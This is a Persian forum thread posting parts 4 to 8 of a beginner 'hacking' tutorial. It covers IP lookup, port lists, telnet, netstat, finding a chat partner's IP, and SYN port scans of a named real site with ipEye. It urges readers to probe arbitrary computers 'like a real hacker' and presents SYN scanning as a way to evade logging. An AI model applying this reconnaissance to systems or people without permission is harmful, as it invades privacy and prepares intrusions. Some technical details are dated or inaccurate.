IAB, IESG, and IRSG Members
RFC1207 FYI on Questions and Answers: Answers to Commonly
Asked "Experienced Internet User
RFC1206 FYI on Questions and Answers: Answers to Commonly
Asked "New Internet User" Questions

uody
30th January 2011, 10:16 AM
عزیزان به قسمت 4 توجه کنید


قسمت 4
موضوع:بحث ip
- Command Prompt چيست؟

دربسياری از درس‌های آينده از Command Prompt (خط فرمان) ويندوز استفادهخواهيم کرد. برای باز کردن آن يکی از روش‌های زير را به کار بريد:

۱- مسير زير را در ويندوز طی کنيد:
Start > Programs > Accessories > Command Prompt
۲- در قسمت Run بنويسيد: command يا cmd


- پيدا کردن ip يک سايت با دانستن آدرس اينترنتی آن (پيدا کردن ip سرور)

برای اين کار روشهای مختلفی هست:

۱-در (Internet Explorer (IE آدرس را تايپ کنيد و Enter را فشار دهيد. درقسمت پايين مرورگر يعنی Status Bar پس از چند لحظه برای مدت کوتاهی ipنمايش داده می‌شود و می‌توانيد آنرا يادداشت کنيد. اگر طول اين مدت بسيارکوتاه است می‌توانيد از صفحه عکس بگيريد ( با دکمه Print Screen ) و در يکنرم‌افزار گرافيکی بعد از باز کردن يک صفحه خالی به کمک Ctrl+V آنرامشاهده کنيد. [ عجب راه احمقانه‌ای ;-)
اگر اين کار را برای http://www.yahoo.com انجام دهيم:

[تصویر: n13810823.gif]

که همان شماره ip برای http://www.yahoo.com است.
نکتهبسيار مهم اين است که به‌دليل ضريب اشتباه بسيار بالای آن هيچ‌گاه از اينروش استفاده نکنيد. نتايج ممکن است کاملا اشتباه باشد که بعدا ميگم چرا.

۲- دستور ping را در command prompt صادر کنيد:
ping domain
دراين حالت می‌توانم ip آن سايت را ملاحظه کنم. (البته کار اصلی ping يک چيزديگست و ميشه گفت داريم ازش سوءاستفاده می‌کنيم). مثلا برای پيدا کردن ipسازين می‌نويسم:
ping sazin.com
و جواب می‌شنوم:
Pinging sazin.com [63.148.227.65] with 32 bytes of data:

Reply from 63.148.227.65: bytes=32 time=821ms TTL=111
Reply from 63.148.227.65: bytes=32 time=821ms TTL=111
Reply from 63.148.227.65: bytes=32 time=822ms TTL=111
Reply from 63.148.227.65: bytes=32 time=811ms TTL=111


Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 811ms, Maximum = 822ms, Average = 818ms
ملاحظه می‌فرماييد که ip سازين 63.148.227.65 است.
اگردستور ping را به‌جای sazin.com برای http://www.sazin.com صادر کنيد، جواب هماناست. البته برای سايت‌های بزرگ جواب‌های حاصل متفاوت خواهد بود.

۳-روش بعدی و کامل‌ترين روش whois کردن به بعضی سايت‌های خاص است. بعدا اينرا کامل‌تر توضيح می‌دم ولی فعلا روشش رو می‌گم. آدرس زير را در مرورگرخود تايپ کنيد:
http://www.samspade.org/t/ipwhois?a=xxxxxx
که به‌جای xxxxxx آدرس مورد نظر را تايپ کنيد. مثلا برای sazin.com يکی از دو آدرس زير را بايد تايپ کرد:
http://www.samspade.org/t/ipwhois?a=sazin.com
http://www.samspade.org/t/ipwhois?a=www.sazin.com
چيزی که در صفحه ظاهر می‌شود به صورت زير است:
whois -h magic 63.148.227.65
sazin.com resolves to 63.148.227.65

Trying whois -h whois.arin.net 63.148.227.65
Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1)
63.144.0.0 - 63.151.255.255
Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1)
63.148.224.0 - 63.148.231.255

# ARIN Whois database, last updated 2002-09-04 19:05
# Enter ? for additional hints on searching ARIN"s Whois database.
که آدرس ip در سطر اول و دوم ذکر شده است.

اگر دو روش آخر را برای سايت بزرگ yahoo انجام دهيم، نتايج زير را می‌بينيم:
--> روش ping :
http://www.yahoo.com ====> 64.58.76.229
yahoo.com ====> 66.218.71.198
--> روش whois :
...و http://www.yahoo.com ====> 66.218.71.86
64.58.79.230 و yahoo.com ====> 66.218.71.198

نتايج حاصل گويای آن است که چرا بهتر است از whois استفاده کنيم.


- تقسيم بندی آدرس‌های ip

آدرس‌هایip به ۵ کلاس تقسيم‌بندی می‌شوند که A تا E نام‌ دارند ولی از اين بين سهکلاس اول (يعنی C,B,A) کاربرد عملی دارند که آنها را شرح می‌دهيم:

۱-کلاس A: اگر ip را به‌صورت xxx.yyy.yyy.yyy در نظر بگيريد، اين کلاس تمامipهايی را شامل می‌شود که xxx بين ۱ تا ۱۲۶ است. اين کلاس ويژه backboneهای بزرگ اينترنتی است و در هنگام ثبت domain برای گرفتن ip از آنهااستفاده می‌شود. بنابراين اکثر سايت‌ها چنين ipهايی دارند. اين کلاس را 8/هم می‌گويند.

۲- کلاس B: اين کلاس تمام ipهايی را شامل می‌شود کهxxx بين ۱۲۸ و ۱۹۱ است. اين کلاس هم از جمله کلاس‌های پرکاربرد است. اينکلاس را 16/ هم می‌گويند.

۳- کلاس C: اين اين کلاس تمام ipهای راشامل می‌شود که xxx بين ۱۹۲ و ۲۲۳ است. اين کلاس معمولا به ISP هايی کهخدمات dial-up ارائه می‌دهند، تعلق می‌گيرد (اين جمله چندان مستند نيست.).بنابراين اگر به‌صورت dial-up به اينترنت متصل شويد، چنين ip می‌گيريد.اين کلاس را 24/ هم می‌گويند.

سوالی که پيش می‌آيد اين است که xxxچرا نه در کلاس A و نه در B، عدد ۱۲۷ را شامل نمی‌شود؟ جواب اين‌ است که۱۲۷ برای کامپيوتر خودمان رزرو شده است. مثلا 127.0.0.1 معمولا يعنیlocalhost يعنی خودمان.


- به‌دست آوردن ip خودتان بعد از اتصال به اينترنت

برای اين‌کار راههای متفاوتی وجود دارد:

۱- راحت‌ترين راه استفاده از دستور ipconfig است. من با تايپ کردن آن به نتايج زير رسيدم:
Windows 2000 IP Configuration

PPP adapter neda:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 217.66.198.116
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : 217.66.198.116
که آدرس ip تان را می‌توانيد در سطر Ip Address ببينيد. (مسئله ****** را فعلا ناديده بگيريد)

۲-بعد از اتصال به اينترنت حداقل يک صفحه باز کنيد و بعد دستور netstat -nرا در command prompt تايپ کنيد. من با تايپ اين دستور به نتايج زير رسيدم:
Active Connections

Proto Local Address Foreign Address State
TCP 217.66.198.116:2469 64.58.76.177:80 ESTABLISHED
TCP 217.66.198.116:2471 66.163.175.130:80 ESTABLISHED
TCP 217.66.198.116:2473 212.73.194.143:80 ESTABLISHED
TCP 217.66.198.116:2474 212.73.194.143:80 ESTABLISHED
TCP 217.66.198.116:2476 212.73.194.136:80 SYN_SENT
ستونی که زير عبارت Local Address قرار دارد، ip من در آن اتصال است. بنابراين ip من در آن اتصال 217.66.198.116 بوده است.


- پيدا کردن ip طرف مقابل هنگام chat با yahoo messenger - اين روش قديمی شده، الان ديگه کار نمی‌کنه

می‌خواهيمدرباره يک کلاينت مثلا کسی که مثل شما يک اتصال مثلا dial-up به اينترنتدارد و فرضا دارد با شما chat می‌کند، کسب اطلاعات کرد.
در اين مورد هماولين نکته‌ای که بايد کشف شود، ip اوست. در اين جلسه می‌خوام بهتون يادبدم که وقتی با يه نفر از طريق yahoo messenger به صورت pm چت می‌کنيد،چطوری می‌تونيد ip اش رو پيدا کنيد. البته بايد توجه کرد که اين روش گاهیکار نمی‌کند. نيز فرض می‌کنم که فقط با يک نفر داريد چت می‌کنيد.
يکی از دستور‌های زير را تايپ می‌کنيد:
netstat -n
netstat
دستور اولی برای پيدا کردن ip طرف مقابل است و دستور دوم گاه می‌تواند اسم کامپيوتر او را برای شما نشان دهد.

من دستور netstat -n را تايپ کردم و به نتايج زير رسيدم:
Active Connections

Proto Local Address Foreign Address State
TCP 195.219.176.126:1296 66.163.173.77:5050 ESTABLISHED
TCP 195.219.176.126:1341 66.218.75.149:80 LAST_ACK
TCP 195.219.176.126:1325 212.234.112.74:5101 SYN_SENT
اولين کاری که می‌کنيد اين است که سطری را پيدا می‌کنيد که در Local Address يا Foreign Address آن، پورت 5101داشته باشد. در اين مثال سطر آخر، سطر مورد نظر ماست. زيرا در ستونForeign Address از سطر آخر، پورت آن 5101 است. البته اگر در ستون LocalAddress هم بود، فرقی نمی‌کرد. وقتی آن سطر را پيدا کرديد، ip طرف مقابلرا از ستون Foreign Address از همان سطر پيدا می‌کنيم. در اين مثال ip طرفمقابل 212.234.112.74 است.
اگر به‌جای netstat -n ، از netstat استفاده می‌کردم، به نتايج زير می‌رسيدم:
Active Connections

Proto Local Address Foreign Address State
TCP artawill...:1296 cs55.msg.sc5.yahoo.com:5050 ESTABLISHED
TCP artawill...:1298 dl3.yahoo.com:http TIME_WAIT
TCP artawill...:1325 Majid:5101 SYN_SENT
ملاحظهمی‌فرماييد که همه ip ها به معادل های اسمی تبديل شده‌اند و در مورد همانسطر آخر به جای ip طرف مقابل اسم کامپيوتر فرد را می‌نويسد (البته درحالتی که طرف مقابل dial-up نباشد، قضيه فرق می‌کند.)

حالا فرض کنيد که يک pm ديگر هم اضافه می‌شود. و دوباره دستور netstat -n را تايپ می‌کنم. حالا نتايج زير را می‌بينم:
Active Connections

Proto Local Address Foreign Address State
TCP 195.219.176.126:1296 66.163.173.77:5050 ESTABLISHED
TCP 195.219.176.126:1344 64.58.77.197:80 ESTABLISHED
TCP 195.219.176.126:5101 212.234.112.74:3735 ESTABLISHED
TCP 195.219.176.126:5101 194.225.184.95:1460 ESTABLISHEDالاندوتا سطر دارم که دارای پورت 5101 باشد، و چون می‌دانم که 212.234.112.74مربوط به نفر قبلی بود، پس 194.225.184.95 مربوط به pm دومی است.

uody
31st January 2011, 12:35 PM
قسمت 5رو هم به دوستانم تقدیم میکنم
آموزش قدم به قدم هک قسمت 5
موضوع :تلنت و پورت ها
- TCP و UDP چيست؟

مدلTCP/IP که برای ارتباط اينترنتی به‌کار می‌رود، می‌توان به لايه‌هایمختلفی تقسيم‌بندی کرد که بعدا بيشتر توضيح می‌دم، اما يکی از اينلايه‌ها، لايه ارتباط host2host است که خود شامل دو پروتکل است به نامهایTCP و UDP :

۱- (TCP (Transmission Control Protocol :
اينپروتکل قوی‌تر و قابل اعتمادتر است و اصولا پروتکل مهمتری نسبت به UDPمحسوب می‌شود. اين پروتکل توانايی بازبينی بسته‌هاو کنترل خطا را هم دارد.

۲- (UDP (User Datagram Protocol :
اين پروتکل برای کاهش overflow طراحی شده است و در خيلی از موارد وابسته به TCP است.

نکتهمهم اين است که وقتی با يک پورت خاص روی يک کامپيوتر ديگر ارتباط برقرارمی‌کنيم، اين ارتباط می‌تواند از نوع TCP يا UDP باشد. بنابراين وقتیمی‌خواهيم يک کامپيوتر خاصی را از نظر پورت‌ها بررسی کنيم، هردو بايدبررسی شود.


- تقسيم‌بندی پورت‌ها از روی شماره آنها

۱- پورت‌های 0 تا 1023 :
مشهورترين پورت‌ها هستند و معمولا هرکدام برای يک سرويس خاص استفاده می‌شود. با تعدادی از اين پورت‌ها در جلسات قبل آشنا شده‌ايد.

۲- پورت‌های 1024 تا 49151 :
اينسری از پورت‌ها مشخصا با هيچ‌يک از سرويس‌های اينترنتی مرتبط نيستند بلکهوقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore ياNetscape Navigator )، نرم‌افزار ارسال و دريافت E-mail (مثل Outlook ياEdura )، نرم‌افزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار می‌کنيد، يکی ازاين پورت‌ها به صورت random باز شده و يک ارتباط با سرور (با توجه به‌نوعسرويس اينترنتی که می‌دهد که يکی از پورت‌های 0 تا 1023 است) برقرار شده وداده‌ها ارسال و دريافت می‌شوند. يعنی پورت شما يکی از پورت‌های اين قسمتاست و پورت سرور يکی از پورت‌های بالايی.اين سری پورت‌ها را پورت‌هایregister شده هم می‌گويند.

۳- پورت‌های 49152 تا 65535 :
اينسری از پورت‌ها به‌ندرت استفاده می‌شوند. کاربرد اساسی آنها برای يک سریسرويس‌های خاص اينترنتی است و يا توسط trojanها (که برای Hack کردنکامپيوتر است) است. البته خيلی از trojanهای معروف از پورت‌های رديف ۲ هماستفاده می‌کنند و اين تقسيم‌بندی‌ها هميشه برقرار نيست و به‌همين علت استکه گاهی پورت‌ها را به دو‌دسته زير 1024 و بالای 1024 تقسيم‌ می‌کنند.


- تکميل ليست پورت‌ها

درجلسه دوم در مورد مهمترين پورت‌ها صحبت کردم. حالا يک ليست کامل‌تر را دراين درس می‌گم. اگر می‌خواهيد يک مرجع نسبتا کامل برای مراجعه داشتهباشيد، اينجارا کليک کنيد. دقت کنيد درس امروز و نيز لينک بالا هيچ بحثی در موردتروجان‌ها نمی‌کند زيرا تروجان‌های شناخته شده هم يک سری پورت پيش‌فرضدارند که در جای خود بحث خواهد شد.
Ports TCP/UDP Service or Application
------ ------- ----------------------------------------
7 tcp echo
11 tcp systat
19 tcp chargen
21 tcp ftp-data
22 tcp ssh
23 tcp telnet
25 tcp smtp
42 tcp nameserver
43 tcp whois
49 udp tacacs
53 udp dns-lookup
53 tcp dns-zone
66 tcp oracle-sqlnet
69 udp tftp
79 tcp finger
80 tcp http
81 tcp alternative for http
88 tcp kerberos or alternative for http
109 tcp pop2
110 tcp pop3
111 tcp sunrpc
118 tcp sqlserv
119 tcp nntp
135 tcp ntrpc-or-dec
139 tcp netbios
143 tcp imap
161 udp snmp
162 udp snmp-trap
179 tcp bgp
256 tcp snmp-checkpoint
389 tcp ldap
396 tcp netware-ip
407 tcp timbuktu
443 tcp https/ssl
445 tcp ms-smb-alternate
445 udp ms-smb-alternate
500 udp ipsec-internet-key-exchange (ike)
513 tcp rlogin
513 udp rwho
514 tcp rshell
514 udp syslog
515 tcp printer
515 udp printer
520 udp router
524 tcp netware-ncp
799 tcp remotely possible
1080 tcp socks
1313 tcp bmc-patrol-db
1352 tcp notes
1433 tcp ms-sql
1494 tcp citrix
1498 tcp sybase-sql-anywhere
1524 tcp ingres-lock
1525 tcp oracle-srv
1527 tcp oracle-tli
1723 tcp pptp
1745 tcp winsock-proxy
2000 tcp remotely-anywhere
2001 tcp cisco-mgmt
2049 tcp nfs
2301 tcp compaq-web
2447 tcp openview
2998 tcp realsecure
3268 tcp ms-active-dir-global-catalog
3268 udp ms-active-dir-global-catalog
3300 tcp bmc-patrol-agent
3306 tcp mysql
3351 tcp ssql
3389 tcp ms-termserv
4001 tcp cisco-mgmt
4045 tcp nfs-lockd
5631 tcp pcanywhere
5800 tcp vnc
6000 tcp xwindows
6001 tcp cisco-mgmt
6549 tcp apc
6667 tcp irc
8000 tcp web
8001 tcp web
8002 tcp web
8080 tcp web
9001 tcp cisco-xremote
12345 tcp netbus
26000 tcp quake
31337 udp backorifice
32771 tcp rpc-solaris
32780 udp snmp-solaris
43188 tcp reachout
65301 tcp pcanywhere-def



- چگونه به يک پورت Telnet کنيم؟

برایاينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد.(البته معمولا تعدادی از پورت‌هايی را که ممکن است اطلاعاتی مهم را دراختيار هکر‌ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنهاشايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپکنيد:
telnet hostname portnum
دراين دستور به‌جای hostname شماره ip و يا نام سايت را وارد می‌کنيد وبه‌جای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن بهپورت ۱۳ که ساعت و تاريخ را به‌دست می‌دهد در کامپيوتری به‌ اسمwww.iums.ac.ir مي‌نويسيد:
telnet iums.ac.ir 13
telnet iums.ac.ir daytime هر دو اين دستورات معادل هم هستند.
تلنتکردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد،زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاویاطلاعات بسيار مهمی هستند.
همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوتر‌های مختلف و پورت‌های گوناگون تلنت کنيد.

uody
1st February 2011, 12:47 PM
اینم قسمت 6وم برای شما دوستان
آموزش قدم به قدم هک قسمت 6
موضوع :انواع scanning
- انواع Scanning

دو نوع معمول Scanning وجود دارد:

۱- Port Scanning :
در اين حالت ما IP يا IPهای مورد نظر را انتخاب کرده‌ايم و حالا می‌خواهيم بدانيم که کدام پورت‌ها روی آن کامپيوترها باز است.

۲- IP Scanning :
دراين اسکنينگ می‌خواهيم بدانيم که از بين يک مجموعه ip ، کدام‌ها up وکدام‌ها down هستند. يعنی کدام ip ها الان قابل دسترسی هستند (يعنی به يهکامپيوتر در اينترنت نسبت داده شده است! ) فرض کنيد که شما يک سری IPمربوط به يک ISP خاص را داريد و می‌خواهيد بدانيد که در اين لحظه کدام‌هافعال (up) هستند تا فقط آنها را بررسی کنيد و نه‌ همه را. ( اين کارمعمولا موقعی پيش می‌آيد که قرار است کلاينت هک کنيد و مهم نيست چه کسیباشد )

uody
2nd February 2011, 10:52 PM
ببخشید دیر شد اینم قسمت 7

آموزش قدم به قدم هک قسمت 7
موضوع:port scanning
- چگونه يک ارتباط TCP برقرار می‌شود که بگوييم فلان پورت باز است يا نه؟

برایاينکه تعيين کنيم که يک پورت روی يک سرور باز است يا نه، معمولا بايد يکTCP connect scan انجام دهيم. اول اين را بگم که Port Scanning انواعمختلف دارد که فعلا ما نوع TCP connect را مدنظر داريم. اين نوع اسکن سهمرحله دارد که به آن TCP"s 3-way handshakeمی‌گويند:
۱- اول کامپيوتر ما به سمت سرور يک SYN packet می‌فرستد که به معنی درخواست اتصال است.
۲- اگر سرور اين درخواست را قبول کند، در مرحله دوم سرور به سمت ما يک SYN/ACK packet می‌فرستد.
۳- در مرحله آخر کامپيوتر ما يک ACK packet به سمت سرور می‌فرستد.

نوعديگری از پورت اسکن TCP SYN scan نام دارد. با توجه به اينکه معمولا اگرپورت اسکن به روش بالا (TCP connect scan) انجام دهيم، معمولا در سرور ايناتصال ذخيره خواهد شد و بعدا می‌تواند ما را رديابی کنند، به جای آنمی‌توان از TCP SYN scan استفاده کرد. در اين نوع اسکن، مراحل ۱ و ۲ ازبالا انجام می‌شود ولی مرحله ۳ نه! اگر در مرحله ۲ به ما يک SYN/ACK برسد،آن پورت باز است و اگر يک RST/ACK برسد، يعنی بسته است.

انواع ديگری از پورت اسکنينگ هم وجود دارد مثل UDP scan, TCP Window scan, TCP ACK scan, TCP Null, TCP Xmas Tree, TCP FIN Scan


- چگونه می‌توان عمل Port scanning را انجام داد؟

درتمام مطالبی که تا اين مرحله گفته‌ام سعی کرده‌ام که فقط از ابزارهایموجود در ويندوز استفاده کنم و هيچ ابزار ديگری به‌کار نبرم، اما در مبحثپورت اسکنينگ چون هيچ ابزاری در ويندوز برای اين‌ کار نيست، به‌ناچار بايديک سری برنامه را از اينترنت داون‌لود کنيد. (توجه داشته باشيد که فعلاحرفی از لينوکس نزده‌ام و سعی می‌کنم فعلا هيچ بحثی را در مورد آن مطرحنکنم)

برای Port Scanning می‌توان از ابزارهای مختلفی استفاده کردکه اکثرا برای لينوکس طراحی شده‌اند، اما مهم‌ترين پورت اسکنرها برایويندوز عبارتند از:

۱- نرم‌افزار NMapWin v1.3.0 :
نسخه گرافيکیو مخصوص ويندوز برای nmap است (nmap در لينوکس استفاده می‌شود). nmap ازکامل‌ترين ابزارهايی است که هکر‌ها استفاده می‌کنند که علاوه بر توانايیانواع پورت اسکنينگ‌ها، می‌تواند کارهای بسياری چون تشخيص سيستم‌عامل سرورو ... را انجام دهد. اين ابزار را بعدا توضيح خواهم داد ولی فعلا برای کارما بيش‌ از حد کامله ;-)

۲- NetScanTools Pro 2000 :
اين هم از بهترين‌هاست ولی چون پولی است به‌ جای داون‌لود بايد در CD هايی که در بازار هست پيدايش کنيد.

۳- WinScan :
برای اسکن کردن TCP (ونه UDP) می‌توانيد از آن استفاده کنيد. من زياد ازش خوشم نيومد.

۴- ipEye v1.2 :
من در این درس از اين نرم‌افزار استفاده خواهم کرد، برای داون‌لود آن می‌توانيد به سايت http://www.ntsecurity.nu/ مراجعه کنيد يا مستقيما با کليک روی اين لينکآن را داون‌لود کنيد. لازم است بگويم که اين نرم‌افزار فقط در ويندوز ۲۰۰۰و xp کار می‌کند و نيز در يک بار اجرا فقط يک ip را می‌تواند تست کند.ضمنا فقط TCP را تست می‌کند.


- چگونه از ipEye برای پورت اسکنينگ استفاده کنيم؟

با تايپ ipEye در command prompt اين نتايج ظاهر می‌شود:
ipEye 1.2 - © 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
- http://ntsecurity.nu/toolbox/ipeye/

Error: Too few parameters.

Usage:

ipEye -p [optional parameters]
ipEye -p
[optional parameters]

is one of the following:
-syn = SYN scan
-fin = FIN scan
-null = Null scan
-xmas = Xmas scan>br>
(note: FIN, Null and Xmas scans don"t work against Windows systems.

[optional parameters] are selected from the following:
-sip = source IP for the scan
-sp = source port for the scan
-d = delay between scanned ports in milliseconds
(default set to 750 ms)

فرضکنيد که می‌خواهيم سايت سازين را از نظر پورت‌ها از پورت ۱ تا ۲۰۰ تستکنيم. اول بايد ip آن را به دست بياوريم که می‌شود، 63.148.227.65 و حالابه کمک دستور زير آن را بررسی می‌کنيم:
ipeye 63.148.227.65 -syn -p 1 200
دقت کنيد که 63.148.227.65 عدد ip سازين، syn- يعنی SYN SCAN و p 1 200-يعنی تست از پورت ۱ تا ۲۰۰ باشد. البته پارامترهای ديگری را هم می‌شود ستکرد که فعلا به درد ما نمی‌خورد. با اجرای اين دستور به نتايج زير می‌رسيم:
ipEye 1.2 - © 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
- http://ntsecurity.nu/toolbox/ipeye/

1-20 [drop]
21 [open]
22 [closed or reject]
23-24 [drop]
25 [open]
26-52 [drop]
53 [open]
54-79 [drop]
80 [open]
81-109 [drop]
110 [open]
111-142 [drop]
143 [open]
144-200 [drop]
201-65535 [not scanned]
Closed يعنی کامپيوتر در آن طرف هست ولی به پورت گوش نمی‌دهد، Reject يعنی اينکه يک firewall هست که اجازه اتصال به آن پورت را نمی‌دهد، Drop يعنی اينکه يک firewall همه‌چيز را پس‌ می‌زند و يا اصلا کامپيوتری اونور نيست، Open هم که يعنی باز.
درمورد سازين می‌بينيد که از بين پورت‌های ۱ تا ۲۰۰ ، پورت‌های ۲۱، ۲۵، ۵۳،۸۰، ۱۱۰، ۱۴۳ باز است و می‌توان به‌ آنها telnet کرد. دقت کنيد که تا تمامپورت‌هايی که مشخص شده، تست نشده است، هيچ نتيجه‌ای نشان داده نمی‌شود ويه‌کم صبر می‌خواد.


- تعيين پورت‌های باز کامپيوتر خودتان

می‌خواهيم درباره کامپيوتر خودمان اين اطلاعات را پيدا کنيم. برای اين کار يکی از دستورات زير را به کار می‌بريم:
netstat -an
netstat -a
فرقاين دو دستور در اين است که اولی پورت‌ها را به صورت عددی و دومی به صورتمعادل اسمی آن پورت می‌نويسد. مثلا معادل اسمی پورت 7 ، echo است.

مثلا اگه netstat -an را تايپ کنم، به اطلاعات زير می‌رسم:
Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:7 0.0.0.0:0 LISTENING
TCP 0.0.0.0:9 0.0.0.0:0 LISTENING
TCP 0.0.0.0:13 0.0.0.0:0 LISTENING
TCP 0.0.0.0:17 0.0.0.0:0 LISTENING
TCP 0.0.0.0:19 0.0.0.0:0 LISTENING
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING
TCP 0.0.0.0:25 0.0.0.0:0 LISTENING
TCP 0.0.0.0:53 0.0.0.0:0 LISTENING
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:119 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:143 0.0.0.0:0 LISTENING
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:515 0.0.0.0:0 LISTENING
TCP 0.0.0.0:563 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1033 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1037 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1040 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1041 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1043 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1755 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1801 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3372 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:6034 0.0.0.0:0 LISTENING
TCP 0.0.0.0:6666 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7007 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7778 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8181 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1039 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1433 0.0.0.0:0 LISTENING
TCP 127.0.0.1:2103 0.0.0.0:0 LISTENING
TCP 127.0.0.1:2105 0.0.0.0:0 LISTENING
TCP 127.0.0.1:2107 0.0.0.0:0 LISTENING
UDP 0.0.0.0:7 *:*
UDP 0.0.0.0:9 *:*
UDP 0.0.0.0:13 *:*
UDP 0.0.0.0:17 *:*
UDP 0.0.0.0:19 *:*
UDP 0.0.0.0:68 *:*
UDP 0.0.0.0:135 *:*
UDP 0.0.0.0:161 *:*
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:1030 *:*
UDP 0.0.0.0:1036 *:*
UDP 0.0.0.0:1038 *:*
UDP 0.0.0.0:1042 *:*
UDP 0.0.0.0:1075 *:*
UDP 0.0.0.0:1434 *:*
UDP 0.0.0.0:1645 *:*
UDP 0.0.0.0:1646 *:*
UDP 0.0.0.0:1755 *:*
UDP 0.0.0.0:1812 *:*
UDP 0.0.0.0:1813 *:*
UDP 0.0.0.0:3456 *:*
UDP 0.0.0.0:3527 *:*
UDP 127.0.0.1:53 *:*
UDP 127.0.0.1:1028 *:*
UDP 127.0.0.1:1029 *:*
UDP 127.0.0.1:1035 *:*
UDP 127.0.0.1:1044 *:*
UDP 127.0.0.1:1045 *:*
UDP 127.0.0.1:1100 *:*
مندستور را موقعی اجرا کردم که به اينترنت متصل نبودم. اگر همين کار را درزمان اتصال به اينترنت انجام می‌دادم، يک سری سطرهای جديد هم اضافه می‌شدکه مربوط به آن اتصال می‌شد. و نيز دقت کنيد که من سويچ an- را استفاده کردم و پورت‌ها به صورت عددی نمايش داده شده است که همين الان - الساعه - براتون توضيح می‌دم:

اولين نکته‌ای که به نظر می‌رسد، نامی است که برای هر ستون نوشته شده است:
Proto Local Address Foreign Address State
- Proto : يعنی پروتکل، که می‌تواند TCP يا UDP باشد.
- Local Address : نشان‌دهندهip کامپيوتر خودمان و شماره پورت‌هاست. مثلا سطر اول می‌گويد که ip من0.0.0.0 است (دقت کنيد که من به اينترنت متصل نيستم) و اولين پورت باز (ازنوع TCP با توجه به اول سطر) عدد ۷ است زيرا اين به صورت 0.0.0.0:7 نوشتهشده است که قسمت قبل از کاراکتر : ، ip است و بعد از کاراکتر :، پورت است.
- Foreign Address : چوندر اين مثال از سويچ a- يا an- استفاده کرده‌ايم، کاربردی ندارد. ولی بعداخواهيد ديد که اگر از يک سويچ ديگر استفاده کنيم، می‌تواند مهم باشد.
- State : وضعيت اتصال را نشان می‌دهد


حالااگه پورت‌ها را يکی يکی بررسی کنيد، می‌بينيد که در پروتکل TCP ، پورت‌های۷، ۹، ۱۳، ۱۷، ۱۹، ۲۱ و... باز است و در پروتکل UDP ، پورت‌های ۷، ۹، ۱۳،۱۷، ۱۹، ۶۸ و ... باز است.

حالا ممکن است بپرسيد که اين اطلاعات به چه دردی می‌خورد؟
جواباين است که دانستن اين اطلاعات برای محافظت از خودتان در برابر همکارانتان(هکرها) است. مثلا اگر يک تروجان روی کامپيوتر شما نصب شده باشد، با ايندستور می‌توان آن را کشف کرد.

uody
3rd February 2011, 11:17 AM
قسمت 8 رو هم به تو دوست خوبم تقدیم میکنم

آموزش قدم به قدم هک قسمت 8
وضوع:ip scanning


- IP Scanning

IP Scanning به روش‌های مختلف می‌تواند صورت بگيرد:


۱-در ساده‌ترين نوع آن، يک پکت از نوع ICMP ECHO به يک ip خاص می‌فرستيم واگر يک ICMP ECHO REPLAY به سمت ما برگشت، در اين صورت آن ip به‌اصطلاح upاست. برای اين‌کار می‌توان از ابزارهای زير استفاده کرد:

الف) استفاده از ping موجود در سيستم‌عامل‌های ويندوز و يونيکس (لينوکس). به صورت زير:
ping xxx.xxx.xxx.xxx
مثلا برای 63.148.227.65 می‌نويسيم:
ping 63.148.227.65
اگر در ويندوز اين دستور را تايپ کنيد و به جواب زير برسيد، يعنی آن ip فعال است:
Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105
Reply from 63.148.227.65: bytes=32 time=941ms TTL=105
Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105
Reply from 63.148.227.65: bytes=32 time=941ms TTL=105
و اگه به پيغام زير رسيديد، يعنی فعال نيست:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
همان طور که می‌بينيد با اين دستور در يک لحظه فقط می‌شود، يک ip را تست کرد و اين کار ما را کند می‌کند.

ب) در سيستم‌عامل لينوکس می‌شود از gping استفاده کرد که يک مجموعه ip را به سرعت تست کرد.

ج) در سيستم عامل ويندوز می‌شود از Pinger استفاده کرد. برای داون‌لود اين نرم‌افزار اينجا را کليک کنيد. Pinger يک نرم‌افزار گرافيکی است و کار ping کردن به يک مجموعه ip را ساده می‌کند.

